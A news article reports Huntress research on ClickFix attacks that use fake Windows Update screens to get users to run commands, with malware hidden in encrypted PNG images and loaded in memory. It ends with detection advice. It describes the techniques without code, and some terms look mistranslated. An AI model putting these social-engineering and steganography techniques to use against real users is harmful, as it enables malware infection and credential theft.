- Fake windows updates deliver advanced malware hidden in encrypted PNG images
- Hackers trick their victims with update screens that secretly execute malicious commands
- Stego Loader rebuilds malicious payloads from scratch in memory using C# routines
Hackers are increasingly using fake Windows Update screenshots to spread complex malware using social engineering techniques.
ClickFix attacks trick users into running commands in Windows by mimicking legitimate refresh requests on full-screen browser pages, Huntress researchers Ben Folland and Anna Pham found.
According to experts, in some cases, attackers ask their victims to press certain keys, which automatically inject malicious commands into the Windows startup area.
Steganography and multi-step uploads.
These commands then trigger the execution of malware, bypassing standard system protections and affecting both individual and enterprise systems.
Malicious payloads are hidden in PNG images using steganography, encrypted with AES, and reconstructed from a .NET assembly called Stego Loader.
This loader extracts shellcode using custom C# routines and repackages it using the donut tool, allowing VBScript, JScript, EXE, DLL, and .NET assembly files to run entirely in memory.
Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.
The use of steganography in these attacks shows that the spread of malware extends beyond traditional executables and presents a new challenge for threat detection and incident response teams.
Attackers also use dynamic evasion tactics like Ctrampoline, which calls thousands of empty functions to make analysis difficult.
In October 2025, a variant using the fake Windows Update honeypot was discovered, and in November, law enforcement took out part of the infrastructure through Operation Endgame.
This prevented the final payload from being delivered via malicious domains, although the fake update pages remained active.
The attacks are constantly evolving, alternating between human authentication requests and refresh animations to trick users into executing commands.
Researchers recommend monitoring process chains for suspicious activity, such as explorer.exe, which generates mshta.exe, or PowerShell.
Researchers can also check the RunMRU registry key to see which commands are running.
Organizations are advised to combine malware removal methods with antivirus software. Scanning and firewall protection to limit exposure.
Other recommended precautions include disabling Windows Launchpad if possible and carefully examining image-based payloads.
Companies must consider the risks of weaponizing seemingly legitimate assets such as images and scripts, making recording, tracking and forensic analysis difficult.
It also raises concerns about supply chain security and the ability of attackers to exploit trusted update mechanisms as an entry point.